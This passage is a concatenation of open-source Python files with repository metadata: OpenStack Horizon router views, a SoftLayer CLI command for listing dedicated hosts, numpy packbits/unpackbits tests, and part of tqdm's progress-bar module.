context['ha_supported'] = api.neutron.get_feature_permission(
self.request, "l3-ha", "get")
return context
def get_tabs(self, request, *args, **kwargs):
router = self._get_data()
ports = self._get_ports()
return self.tab_group_class(request, router=router,
ports=ports, **kwargs)
class CreateView(forms.ModalFormView):
form_class = project_forms.CreateForm
form_id = "create_router_form"
modal_header = _("Create Router")
template_name = 'project/routers/create.html'
success_url = reverse_lazy("horizon:project:routers:index")
page_title = _("Create Router")
submit_label = _("Create Router")
submit_url = reverse_lazy("horizon:project:routers:create")
class UpdateView(forms.ModalFormView):
form_class = project_forms.UpdateForm
form_id = "update_router_form"
modal_header = _("Edit Router")
template_name = 'project/routers/update.html'
success_url = reverse_lazy("horizon:project:routers:index")
page_title = _("Update Router")
submit_label = _("Save Changes")
submit_url = "horizon:project:routers:update"
def get_context_data(self, **kwargs):
context = super(UpdateView, self).get_context_data(**kwargs)
args = (self.kwargs['router_id'],)
context["router_id"] = self.kwargs['router_id']
context['submit_url'] = reverse(self.submit_url, args=args)
return context
def _get_object(self, *args, **kwargs):
router_id = self.kwargs['router_id']
try:
return api.neutron.router_get(self.request, router_id)
except Exception:
redirect = self.success_url
msg = _('Unable to retrieve router details.')
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
router = self._get_object()
initial = {'router_id': router['id'],
'tenant_id': router['tenant_id'],
'name': router['name'],
'admin_state': router['admin_state_up']}
if hasattr(router, 'distributed'):
initial['mode'] = ('distributed' if router.distributed
else 'centralized')
if hasattr(router, 'ha'):
initial['ha'] = router.ha
return initial
|
apache-2.0
|
softlayer/softlayer-python
|
SoftLayer/CLI/dedicatedhost/list.py
|
4
|
2313
|
"""List dedicated servers."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import columns as column_helper
from SoftLayer.CLI import environment
from SoftLayer.CLI import formatting
from SoftLayer.CLI import helpers
COLUMNS = [
column_helper.Column('datacenter', ('datacenter', 'name')),
column_helper.Column(
'created_by',
('billingItem', 'orderItem', 'order', 'userRecord', 'username')),
column_helper.Column(
'tags',
lambda server: formatting.tags(server.get('tagReferences')),
mask="tagReferences.tag.name"),
]
DEFAULT_COLUMNS = [
'id',
'name',
'cpuCount',
'diskCapacity',
'memoryCapacity',
'datacenter',
'guestCount',
]
@click.command()
@click.option('--cpu', '-c', help='Number of CPU cores', type=click.INT)
@helpers.multi_option('--tag', help='Filter by tags')
@click.option('--sortby', help='Column to sort by',
default='name',
show_default=True)
@click.option('--columns',
callback=column_helper.get_formatter(COLUMNS),
help='Columns to display. [options: %s]'
% ', '.join(column.name for column in COLUMNS),
default=','.join(DEFAULT_COLUMNS),
show_default=True)
@click.option('--datacenter', '-d', help='Datacenter shortname')
@click.option('--name', '-H', help='Host portion of the FQDN')
@click.option('--memory', '-m', help='Memory capacity in mebibytes',
type=click.INT)
@click.option('--disk', '-D', help='Disk capacity')
@environment.pass_env
def cli(env, sortby, cpu, columns, datacenter, name, memory, disk, tag):
"""List dedicated host."""
mgr = SoftLayer.DedicatedHostManager(env.client)
hosts = mgr.list_instances(cpus=cpu,
datacenter=datacenter,
hostname=name,
memory=memory,
disk=disk,
tags=tag,
mask=columns.mask())
table = formatting.Table(columns.columns)
table.sortby = sortby
for host in hosts:
table.add_row([value or formatting.blank()
for value in columns.row(host)])
env.fout(table)
|
mit
|
gfyoung/numpy
|
numpy/lib/tests/test_packbits.py
|
17
|
12851
|
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import assert_array_equal, assert_equal, assert_raises
def test_packbits():
# Copied from the docstring.
a = [[[1, 0, 1], [0, 1, 0]],
[[1, 1, 0], [0, 0, 1]]]
for dt in '?bBhHiIlLqQ':
arr = np.array(a, dtype=dt)
b = np.packbits(arr, axis=-1)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, np.array([[[160], [64]], [[192], [32]]]))
assert_raises(TypeError, np.packbits, np.array(a, dtype=float))
def test_packbits_empty():
shapes = [
(0,), (10, 20, 0), (10, 0, 20), (0, 10, 20), (20, 0, 0), (0, 20, 0),
(0, 0, 20), (0, 0, 0),
]
for dt in '?bBhHiIlLqQ':
for shape in shapes:
a = np.empty(shape, dtype=dt)
b = np.packbits(a)
assert_equal(b.dtype, np.uint8)
assert_equal(b.shape, (0,))
def test_packbits_empty_with_axis():
# Original shapes and lists of packed shapes for different axes.
shapes = [
((0,), [(0,)]),
((10, 20, 0), [(2, 20, 0), (10, 3, 0), (10, 20, 0)]),
((10, 0, 20), [(2, 0, 20), (10, 0, 20), (10, 0, 3)]),
((0, 10, 20), [(0, 10, 20), (0, 2, 20), (0, 10, 3)]),
((20, 0, 0), [(3, 0, 0), (20, 0, 0), (20, 0, 0)]),
((0, 20, 0), [(0, 20, 0), (0, 3, 0), (0, 20, 0)]),
((0, 0, 20), [(0, 0, 20), (0, 0, 20), (0, 0, 3)]),
((0, 0, 0), [(0, 0, 0), (0, 0, 0), (0, 0, 0)]),
]
for dt in '?bBhHiIlLqQ':
for in_shape, out_shapes in shapes:
for ax, out_shape in enumerate(out_shapes):
a = np.empty(in_shape, dtype=dt)
b = np.packbits(a, axis=ax)
assert_equal(b.dtype, np.uint8)
assert_equal(b.shape, out_shape)
def test_packbits_large():
# test data large enough for 16 byte vectorization
a = np.array([1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0,
0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1,
1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0,
1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1,
1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1,
1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1,
0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1,
1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0,
1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1,
1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0,
0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 1,
1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0,
1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0,
1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0])
a = a.repeat(3)
for dtype in '?bBhHiIlLqQ':
arr = np.array(a, dtype=dtype)
b = np.packbits(arr, axis=None)
assert_equal(b.dtype, np.uint8)
r = [252, 127, 192, 3, 254, 7, 252, 0, 7, 31, 240, 0, 28, 1, 255, 252,
113, 248, 3, 255, 192, 28, 15, 192, 28, 126, 0, 224, 127, 255,
227, 142, 7, 31, 142, 63, 28, 126, 56, 227, 240, 0, 227, 128, 63,
224, 14, 56, 252, 112, 56, 255, 241, 248, 3, 240, 56, 224, 112,
63, 255, 255, 199, 224, 14, 0, 31, 143, 192, 3, 255, 199, 0, 1,
255, 224, 1, 255, 252, 126, 63, 0, 1, 192, 252, 14, 63, 0, 15,
199, 252, 113, 255, 3, 128, 56, 252, 14, 7, 0, 113, 255, 255, 142, 56, 227,
129, 248, 227, 129, 199, 31, 128]
assert_array_equal(b, r)
# equal for size being multiple of 8
assert_array_equal(np.unpackbits(b)[:-4], a)
# check last byte of different remainders (16 byte vectorization)
b = [np.packbits(arr[:-i], axis=None)[-1] for i in range(1, 16)]
assert_array_equal(b, [128, 128, 128, 31, 30, 28, 24, 16, 0, 0, 0, 199,
198, 196, 192])
arr = arr.reshape(36, 25)
b = np.packbits(arr, axis=0)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, [[190, 186, 178, 178, 150, 215, 87, 83, 83, 195,
199, 206, 204, 204, 140, 140, 136, 136, 8, 40, 105,
107, 75, 74, 88],
[72, 216, 248, 241, 227, 195, 202, 90, 90, 83,
83, 119, 127, 109, 73, 64, 208, 244, 189, 45,
41, 104, 122, 90, 18],
[113, 120, 248, 216, 152, 24, 60, 52, 182, 150,
150, 150, 146, 210, 210, 246, 255, 255, 223,
151, 21, 17, 17, 131, 163],
[214, 210, 210, 64, 68, 5, 5, 1, 72, 88, 92,
92, 78, 110, 39, 181, 149, 220, 222, 218, 218,
202, 234, 170, 168],
[0, 128, 128, 192, 80, 112, 48, 160, 160, 224,
240, 208, 144, 128, 160, 224, 240, 208, 144,
144, 176, 240, 224, 192, 128]])
b = np.packbits(arr, axis=1)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, [[252, 127, 192, 0],
[ 7, 252, 15, 128],
[240, 0, 28, 0],
[255, 128, 0, 128],
[192, 31, 255, 128],
[142, 63, 0, 0],
[255, 240, 7, 0],
[ 7, 224, 14, 0],
[126, 0, 224, 0],
[255, 255, 199, 0],
[ 56, 28, 126, 0],
[113, 248, 227, 128],
[227, 142, 63, 0],
[ 0, 28, 112, 0],
[ 15, 248, 3, 128],
[ 28, 126, 56, 0],
[ 56, 255, 241, 128],
[240, 7, 224, 0],
[227, 129, 192, 128],
[255, 255, 254, 0],
[126, 0, 224, 0],
[ 3, 241, 248, 0],
[ 0, 255, 241, 128],
[128, 0, 255, 128],
[224, 1, 255, 128],
[248, 252, 126, 0],
[ 0, 7, 3, 128],
[224, 113, 248, 0],
[ 0, 252, 127, 128],
[142, 63, 224, 0],
[224, 14, 63, 0],
[ 7, 3, 128, 0],
[113, 255, 255, 128],
[ 28, 113, 199, 0],
[ 7, 227, 142, 0],
[ 14, 56, 252, 0]])
arr = arr.T.copy()
b = np.packbits(arr, axis=0)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, [[252, 7, 240, 255, 192, 142, 255, 7, 126, 255,
56, 113, 227, 0, 15, 28, 56, 240, 227, 255,
126, 3, 0, 128, 224, 248, 0, 224, 0, 142, 224,
7, 113, 28, 7, 14],
[127, 252, 0, 128, 31, 63, 240, 224, 0, 255,
28, 248, 142, 28, 248, 126, 255, 7, 129, 255,
0, 241, 255, 0, 1, 252, 7, 113, 252, 63, 14,
3, 255, 113, 227, 56],
[192, 15, 28, 0, 255, 0, 7, 14, 224, 199, 126,
227, 63, 112, 3, 56, 241, 224, 192, 254, 224,
248, 241, 255, 255, 126, 3, 248, 127, 224, 63,
128, 255, 199, 142, 252],
[0, 128, 0, 128, 128, 0, 0, 0, 0, 0, 0, 128, 0,
0, 128, 0, 128, 0, 128, 0, 0, 0, 128, 128,
128, 0, 128, 0, 128, 0, 0, 0, 128, 0, 0, 0]])
b = np.packbits(arr, axis=1)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, [[190, 72, 113, 214, 0],
[186, 216, 120, 210, 128],
[178, 248, 248, 210, 128],
[178, 241, 216, 64, 192],
[150, 227, 152, 68, 80],
[215, 195, 24, 5, 112],
[ 87, 202, 60, 5, 48],
[ 83, 90, 52, 1, 160],
[ 83, 90, 182, 72, 160],
[195, 83, 150, 88, 224],
[199, 83, 150, 92, 240],
[206, 119, 150, 92, 208],
[204, 127, 146, 78, 144],
[204, 109, 210, 110, 128],
[140, 73, 210, 39, 160],
[140, 64, 246, 181, 224],
[136, 208, 255, 149, 240],
[136, 244, 255, 220, 208],
[ 8, 189, 223, 222, 144],
[ 40, 45, 151, 218, 144],
[105, 41, 21, 218, 176],
[107, 104, 17, 202, 240],
[ 75, 122, 17, 234, 224],
[ 74, 90, 131, 170, 192],
[ 88, 18, 163, 168, 128]])
# result is the same if input is multiplied with a nonzero value
for dtype in 'bBhHiIlLqQ':
arr = np.array(a, dtype=dtype)
rnd = np.random.randint(low=np.iinfo(dtype).min,
high=np.iinfo(dtype).max, size=arr.size,
dtype=dtype)
rnd[rnd == 0] = 1
arr *= rnd.astype(dtype)
b = np.packbits(arr, axis=-1)
assert_array_equal(np.unpackbits(b)[:-4], a)
assert_raises(TypeError, np.packbits, np.array(a, dtype=float))
def test_packbits_very_large():
# test some with a larger arrays gh-8637
# code is covered earlier but larger array makes crash on bug more likely
for s in range(950, 1050):
for dt in '?bBhHiIlLqQ':
x = np.ones((200, s), dtype=bool)
np.packbits(x, axis=1)
def test_unpackbits():
# Copied from the docstring.
a = np.array([[2], [7], [23]], dtype=np.uint8)
b = np.unpackbits(a, axis=1)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, np.array([[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 0, 1, 1, 1]]))
def test_unpackbits_empty():
a = np.empty((0,), dtype=np.uint8)
b = np.unpackbits(a)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, np.empty((0,)))
def test_unpackbits_empty_with_axis():
# Lists of packed shapes for different axes and unpacked shapes.
shapes = [
([(0,)], (0,)),
([(2, 24, 0), (16, 3, 0), (16, 24, 0)], (16, 24, 0)),
([(2, 0, 24), (16, 0, 24), (16, 0, 3)], (16, 0, 24)),
([(0, 16, 24), (0, 2, 24), (0, 16, 3)], (0, 16, 24)),
([(3, 0, 0), (24, 0, 0), (24, 0, 0)], (24, 0, 0)),
([(0, 24, 0), (0, 3, 0), (0, 24, 0)], (0, 24, 0)),
([(0, 0, 24), (0, 0, 24), (0, 0, 3)], (0, 0, 24)),
([(0, 0, 0), (0, 0, 0), (0, 0, 0)], (0, 0, 0)),
]
for in_shapes, out_shape in shapes:
for ax, in_shape in enumerate(in_shapes):
a = np.empty(in_shape, dtype=np.uint8)
b = np.unpackbits(a, axis=ax)
assert_equal(b.dtype, np.uint8)
assert_equal(b.shape, out_shape)
def test_unpackbits_large():
# test all possible numbers via comparison to already tested packbits
d = np.arange(277, dtype=np.uint8)
assert_array_equal(np.packbits(np.unpackbits(d)), d)
assert_array_equal(np.packbits(np.unpackbits(d[::2])), d[::2])
d = np.tile(d, (3, 1))
assert_array_equal(np.packbits(np.unpackbits(d, axis=1), axis=1), d)
d = d.T.copy()
assert_array_equal(np.packbits(np.unpackbits(d, axis=0), axis=0), d)
|
bsd-3-clause
|
Eric89GXL/mne-python
|
mne/externals/tqdm/_tqdm/std.py
|
14
|
55471
|
"""
Customisable progressbar decorator for iterators.
Includes a default (x)range iterator printing to stderr.
Usage:
>>> from tqdm import trange[, tqdm]
>>> for i in trange(10): #same as: for i in tqdm(xrange(10))
... ...
"""
from __future__ import absolute_import, division
# compatibility functions and utilities
from .utils import _supports_unicode, _environ_cols_wrapper, _range, _unich, \
_term_move_up, _unicode, WeakSet, _basestring, _OrderedDict, _text_width, \
Comparable, RE_ANSI, _is_ascii, FormatReplace, \
SimpleTextIOWrapper, CallbackIOWrapper
from ._monitor import TMonitor
# native libraries
from contextlib import contextmanager
import sys
from numbers import Number
from time import time
# For parallelism safety
import threading as th
from warnings import warn
__author__ = {"github.com/": ["noamraph", "obiwanus", "kmike", "hadim",
"casperdcl", "lrq3000"]}
__all__ = ['tqdm', 'trange',
'TqdmTypeError', 'TqdmKeyError', 'TqdmWarning',
'TqdmExperimentalWarning', 'TqdmDeprecationWarning',
'TqdmMonitorWarning']
class TqdmTypeError(TypeError):
pass
class TqdmKeyError(KeyError):
pass
class TqdmWarning(Warning):
"""base class for all tqdm warnings.
Used for non-external-code-breaking errors, such as garbled printing.
"""
def __init__(self, msg, fp_write=None, *a, **k):
if fp_write is not None:
fp_write("\n" + self.__class__.__name__ + ": " +
str(msg).rstrip() + '\n')
else:
super(TqdmWarning, self).__init__(msg, *a, **k)
class TqdmExperimentalWarning(TqdmWarning, FutureWarning):
"""beta feature, unstable API and behaviour"""
pass
class TqdmDeprecationWarning(TqdmWarning, DeprecationWarning):
# not suppressed if raised
pass
class TqdmMonitorWarning(TqdmWarning, RuntimeWarning):
"""tqdm monitor errors which do not affect external functionality"""
pass
class TqdmDefaultWriteLock(object):
"""
Provide a default write lock for thread and multiprocessing safety.
Works only on platforms supporting `fork` (so Windows is excluded).
You must initialise a `tqdm` or `TqdmDefaultWriteLock` instance
before forking in order for the write lock to work.
On Windows, you need to supply the lock from the parent to the children as
an argument to joblib or the parallelism lib you use.
"""
def __init__(self):
# Create global parallelism locks to avoid racing issues with parallel
# bars works only if fork available (Linux/MacOSX, but not Windows)
self.create_mp_lock()
self.create_th_lock()
cls = type(self)
self.locks = [lk for lk in [cls.mp_lock, cls.th_lock] if lk is not None]
def acquire(self, *a, **k):
for lock in self.locks:
lock.acquire(*a, **k)
def release(self):
for lock in self.locks[::-1]: # Release in inverse order of acquisition
lock.release()
def __enter__(self):
self.acquire()
def __exit__(self, *exc):
self.release()
@classmethod
def create_mp_lock(cls):
if not hasattr(cls, 'mp_lock'):
try:
from multiprocessing import RLock
cls.mp_lock = RLock() # multiprocessing lock
except ImportError: # pragma: no cover
cls.mp_lock = None
except OSError: # pragma: no cover
cls.mp_lock = None
@classmethod
def create_th_lock(cls):
if not hasattr(cls, 'th_lock'):
try:
cls.th_lock = th.RLock() # thread lock
except OSError: # pragma: no cover
cls.th_lock = None
# Create a thread lock before instantiation so that no setup needs to be done
# before running in a multithreaded environment.
# Do not create the multiprocessing lock because it sets the multiprocessing
# context and does not allow the user to use 'spawn' or 'forkserver' methods.
TqdmDefaultWriteLock.create_th_lock()
class Bar(object):
"""
`str.format`-able bar with format specifiers: `[width][type]`
- `width`
+ unspecified (default): use `self.default_len`
+ `int >= 0`: overrides `self.default_len`
+ `int < 0`: subtract from `self.default_len`
- `type`
+ `a`: ascii (`charset=self.ASCII` override)
+ `u`: unicode (`charset=self.UTF` override)
+ `b`: blank (`charset=" "` override)
"""
ASCII = " 123456789#"
UTF = u" " + u''.join(map(_unich, range(0x258F, 0x2587, -1)))
BLANK = " "
def __init__(self, frac, default_len=10, charset=UTF):
if not (0 <= frac <= 1):
warn("clamping frac to range [0, 1]", TqdmWarning, stacklevel=2)
frac = max(0, min(1, frac))
assert default_len > 0
self.frac = frac
self.default_len = default_len
self.charset = charset
def __format__(self, format_spec):
if format_spec:
_type = format_spec[-1].lower()
try:
charset = dict(a=self.ASCII, u=self.UTF, b=self.BLANK)[_type]
except KeyError:
charset = self.charset
else:
format_spec = format_spec[:-1]
if format_spec:
N_BARS = int(format_spec)
if N_BARS < 0:
N_BARS += self.default_len
else:
N_BARS = self.default_len
else:
charset = self.charset
N_BARS = self.default_len
nsyms = len(charset) - 1
bar_length, frac_bar_length = divmod(
int(self.frac * N_BARS * nsyms), nsyms)
bar = charset[-1] * bar_length
frac_bar = charset[frac_bar_length]
# whitespace padding
if bar_length < N_BARS:
return bar + frac_bar + \
charset[0] * (N_BARS - bar_length - 1)
return bar
class tqdm(Comparable):
"""
Decorate an iterable object, returning an iterator which acts exactly
like the original iterable, but prints a dynamically updating
progressbar every time a value is requested.
"""
monitor_interval = 10 # set to 0 to disable the thread
monitor = None
@staticmethod
def format_sizeof(num, suffix='', divisor=1000):
"""
Formats a number (greater than unity) with SI Order of Magnitude
prefixes.
Parameters
----------
num : float
Number ( >= 1) to format.
suffix : str, optional
Post-postfix [default: ''].
divisor : float, optional
Divisor between prefixes [default: 1000].
Returns
-------
out : str
Number with Order of Magnitude SI unit postfix.
"""
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 999.5:
if abs(num) < 99.95:
if abs(num) < 9.995:
return '{0:1.2f}'.format(num) + unit + suffix
return '{0:2.1f}'.format(num) + unit + suffix
return '{0:3.0f}'.format(num) + unit + suffix
num /= divisor
return '{0:3.1f}Y'.format(num) + suffix
@staticmethod
def format_interval(t):
"""
Formats a number of seconds as a clock time, [H:]MM:SS
Parameters
----------
t : int
Number of seconds.
Returns
-------
out : str
[H:]MM:SS
"""
mins, s = divmod(int(t), 60)
h, m = divmod(mins, 60)
if h:
return '{0:d}:{1:02d}:{2:02d}'.format(h, m, s)
else:
return '{0:02d}:{1:02d}'.format(m, s)
@staticmethod
def format_num(n):
"""
Intelligent scientific notation (.3g).
Parameters
----------
n : int or float or Numeric
A Number.
Returns
-------
out : str
Formatted number.
"""
f = '{0:.3g}'.format(n).replace('+0', '+').replace('-0', '-')
n = str(n)
return f if len(f) < len(n) else n
@staticmethod
def ema(x, mu=None, alpha=0.3):
"""
Exponential moving average: smoothing to give progressively lower
weights to older values.
Parameters
----------
x : float
New value to include in EMA.
mu : float, optional
Previous EMA value.
alpha : float, optional
Smoothing factor in range [0, 1], [default: 0.3].
Increase to give more weight to recent values.
Ranges from 0 (yields mu) to 1 (yields x).
"""
return x if mu is None else (alpha * x) + (1 - alpha) * mu
@staticmethod
def status_printer(file):
"""
Manage the printing and in-place updating of a line of characters.
Note that if the string is longer than a line, then in-place
updating may not work (it will print a new line at each refresh).
"""
fp = file
fp_flush = getattr(fp, 'flush', lambda: None) # pragma: no cover
def fp_write(s):
fp.write(_unicode(s))
fp_flush()
last_len = [0]
def print_status(s):
len_s = len(s)
fp_write('\r' + s + (' ' * max(last_len[0] - len_s, 0)))
last_len[0] = len_s
return print_status
@staticmethod
def format_meter(n, total, elapsed, ncols=None, prefix='', ascii=False,
unit='it', unit_scale=False, rate=None, bar_format=None,
postfix=None, unit_divisor=1000, **extra_kwargs):
"""
Return a string-based progress bar given some parameters
Parameters
----------
n : int or float
Number of finished iterations.
total : int or float
The expected total number of iterations. If meaningless (None),
only basic progress statistics are displayed (no ETA).
elapsed : float
Number of seconds passed since start.
ncols : int, optional
The width of the entire output message. If specified,
dynamically resizes `{bar}` to stay within this bound
[default: None]. If `0`, will not print any bar (only stats).
The fallback is `{bar:10}`.
prefix : str, optional
Prefix message (included in total width) [default: ''].
Use as {desc} in bar_format string.
ascii : bool, optional or str, optional
If not set, use unicode (smooth blocks) to fill the meter
[default: False]. The fallback is to use ASCII characters
" 123456789#".
unit : str, optional
The iteration unit [default: 'it'].
unit_scale : bool or int or float, optional
If 1 or True, the number of iterations will be printed with an
appropriate SI metric prefix (k = 10^3, M = 10^6, etc.)
[default: False]. If any other non-zero number, will scale
`total` and `n`.
rate : float, optional
Manual override for iteration rate.
If [default: None], uses n/elapsed.
bar_format : str, optional
Specify a custom bar string formatting. May impact performance.
[default: '{l_bar}{bar}{r_bar}'], where
l_bar='{desc}: {percentage:3.0f}%|' and
r_bar='| {n_fmt}/{total_fmt} [{elapsed}<{remaining}, '
'{rate_fmt}{postfix}]'
Possible vars: l_bar, bar, r_bar, n, n_fmt, total, total_fmt,
percentage, elapsed, elapsed_s, ncols, desc, unit,
rate, rate_fmt, rate_noinv, rate_noinv_fmt,
rate_inv, rate_inv_fmt, postfix, unit_divisor,
remaining, remaining_s.
Note that a trailing ": " is automatically removed after {desc}
if the latter is empty.
postfix : *, optional
Similar to `prefix`, but placed at the end
(e.g. for additional stats).
Note: postfix is usually a string (not a dict) for this method,
and will if possible be set to postfix = ', ' + postfix.
However other types are supported (#382).
unit_divisor : float, optional
[default: 1000], ignored unless `unit_scale` is True.
Returns
-------
out : Formatted meter and stats, ready to display.
"""
# sanity check: total
if total and n >= (total + 0.5): # allow float imprecision (#849)
total = None
# apply custom scale if necessary
if unit_scale and unit_scale not in (True, 1):
if total:
total *= unit_scale
n *= unit_scale
if rate:
rate *= unit_scale # by default rate = 1 / self.avg_time
unit_scale = False
elapsed_str = tqdm.format_interval(elapsed)
# if unspecified, attempt to use rate = average speed
# (we allow manual override since predicting time is an arcane art)
if rate is None and elapsed:
rate = n / elapsed
inv_rate = 1 / rate if rate else None
format_sizeof = tqdm.format_sizeof
rate_noinv_fmt = ((format_sizeof(rate) if unit_scale else
'{0:5.2f}'.format(rate))
if rate else '?') + unit + '/s'
rate_inv_fmt = ((format_sizeof(inv_rate) if unit_scale else
'{0:5.2f}'.format(inv_rate))
if inv_rate else '?') + 's/' + unit
rate_fmt = rate_inv_fmt if inv_rate and inv_rate > 1 else rate_noinv_fmt
if unit_scale:
n_fmt = format_sizeof(n, divisor=unit_divisor)
total_fmt = format_sizeof(total, divisor=unit_divisor) \
if total is not None else '?'
else:
n_fmt = str(n)
total_fmt = str(total) if total is not None else '?'
try:
postfix = ', ' + postfix if postfix else ''
except TypeError:
pass
remaining = (total - n) / rate if rate and total else 0
remaining_str = tqdm.format_interval(remaining) if rate else '?'
# format the stats displayed to the left and right sides of the bar
if prefix:
# old prefix setup work around
bool_prefix_colon_already = (prefix[-2:] == ": ")
l_bar = prefix if bool_prefix_colon_already else prefix + ": "
else:
l_bar = ''
r_bar = '| {0}/{1} [{2}<{3}, {4}{5}]'.format(
n_fmt, total_fmt, elapsed_str, remaining_str, rate_fmt, postfix)
# Custom bar formatting
# Populate a dict with all available progress indicators
format_dict = dict(
# slight extension of self.format_dict
n=n, n_fmt=n_fmt, total=total, total_fmt=total_fmt,
elapsed=elapsed_str, elapsed_s=elapsed,
ncols=ncols, desc=prefix or '', unit=unit,
rate=inv_rate if inv_rate and inv_rate > 1 else rate,
rate_fmt=rate_fmt, rate_noinv=rate,
rate_noinv_fmt=rate_noinv_fmt, rate_inv=inv_rate,
rate_inv_fmt=rate_inv_fmt,
postfix=postfix, unit_divisor=unit_divisor,
# plus more useful definitions
remaining=remaining_str, remaining_s=remaining,
l_bar=l_bar, r_bar=r_bar,
**extra_kwargs)
# total is known: we can predict some stats
if total:
# fractional and percentage progress
frac = n / total
percentage = frac * 100
l_bar += '{0:3.0f}%|'.format(percentage)
if ncols == 0:
return l_bar[:-1] + r_bar[1:]
format_dict.update(l_bar=l_bar)
if bar_format:
format_dict.update(percentage=percentage)
# auto-remove colon for empty `desc`
if not prefix:
bar_format = bar_format.replace("{desc}: ", '')
else:
bar_format = "{l_bar}{bar}{r_bar}"
full_bar = FormatReplace()
try:
nobar = bar_format.format(bar=full_bar, **format_dict)
except UnicodeEncodeError:
bar_format = _unicode(bar_format)
nobar = bar_format.format(bar=full_bar, **format_dict)
if not full_bar.format_called:
# no {bar}, we can just format and return
return nobar
# Formatting progress bar space available for bar's display
full_bar = Bar(
frac,
max(1, ncols - _text_width(RE_ANSI.sub('', nobar)))
if ncols else 10,
charset=Bar.ASCII if ascii is True else ascii or Bar.UTF)
if not _is_ascii(full_bar.charset) and _is_ascii(bar_format):
bar_format = _unicode(bar_format)
return bar_format.format(bar=full_bar, **format_dict)
elif bar_format:
# user-specified bar_format but no total
l_bar += '|'
format_dict.update(l_bar=l_bar, percentage=0)
full_bar = FormatReplace()
nobar = bar_format.format(bar=full_bar, **format_dict)
if not full_bar.format_called:
return nobar
full_bar = Bar(
0,
max(1, ncols - _text_width(RE_ANSI.sub('', nobar)))
if ncols else 10,
charset=Bar.BLANK)
return bar_format.format(bar=full_bar, **format_dict)
else:
# no total: no progressbar, ETA, just progress stats
return ((prefix + ": ") if prefix else '') + \
'{0}{1} [{2}, {3}{4}]'.format(
n_fmt, unit, elapsed_str, rate_fmt, postfix)
def __new__(cls, *args, **kwargs):
# Create a new instance
instance = object.__new__(cls)
# Construct the lock if it does not exist
with cls.get_lock():
# Add to the list of instances
if not hasattr(cls, '_instances'):
cls._instances = WeakSet()
cls._instances.add(instance)
# Create the monitoring thread
if cls.monitor_interval and (cls.monitor is None or not
cls.monitor.report()):
try:
cls.monitor = TMonitor(cls, cls.monitor_interval)
except Exception as e: # pragma: nocover
warn("tqdm:disabling monitor support"
" (monitor_interval = 0) due to:\n" + str(e),
TqdmMonitorWarning, stacklevel=2)
cls.monitor_interval = 0
# Return the instance
return instance
@classmethod
def _get_free_pos(cls, instance=None):
"""Skips specified instance."""
positions = set(abs(inst.pos) for inst in cls._instances
if inst is not instance and hasattr(inst, "pos"))
return min(set(range(len(positions) + 1)).difference(positions))
@classmethod
def _decr_instances(cls, instance):
"""
Remove from list and reposition other bars
so that newer bars won't overlap previous bars
"""
with cls._lock:
try:
cls._instances.remove(instance)
except KeyError:
# if not instance.gui: # pragma: no cover
# raise
pass # py2: maybe magically removed already
# else:
if not instance.gui:
for inst in cls._instances:
# negative `pos` means fixed
if hasattr(inst, "pos") and inst.pos > abs(instance.pos):
inst.clear(nolock=True)
inst.pos -= 1
# TODO: check this doesn't overwrite another fixed bar
# Kill monitor if no instances are left
if not cls._instances and cls.monitor:
try:
cls.monitor.exit()
del cls.monitor
except AttributeError: # pragma: nocover
pass
else:
cls.monitor = None
@classmethod
def write(cls, s, file=None, end="\n", nolock=False):
"""Print a message via tqdm (without overlap with bars)."""
fp = file if file is not None else sys.stdout
with cls.external_write_mode(file=file, nolock=nolock):
# Write the message
fp.write(s)
fp.write(end)
@classmethod
@contextmanager
def external_write_mode(cls, file=None, nolock=False):
"""
Disable tqdm within context and refresh tqdm when exits.
Useful when writing to standard output stream
"""
fp = file if file is not None else sys.stdout
if not nolock:
cls.get_lock().acquire()
# Clear all bars
inst_cleared = []
for inst in getattr(cls, '_instances', []):
# Clear instance if in the target output file
# or if write output + tqdm output are both either
# sys.stdout or sys.stderr (because both are mixed in terminal)
if hasattr(inst, "start_t") and (inst.fp == fp or all(
f in (sys.stdout, sys.stderr) for f in (fp, inst.fp))):
inst.clear(nolock=True)
inst_cleared.append(inst)
yield
# Force refresh display of bars we cleared
for inst in inst_cleared:
inst.refresh(nolock=True)
if not nolock:
cls._lock.release()
@classmethod
def set_lock(cls, lock):
"""Set the global lock."""
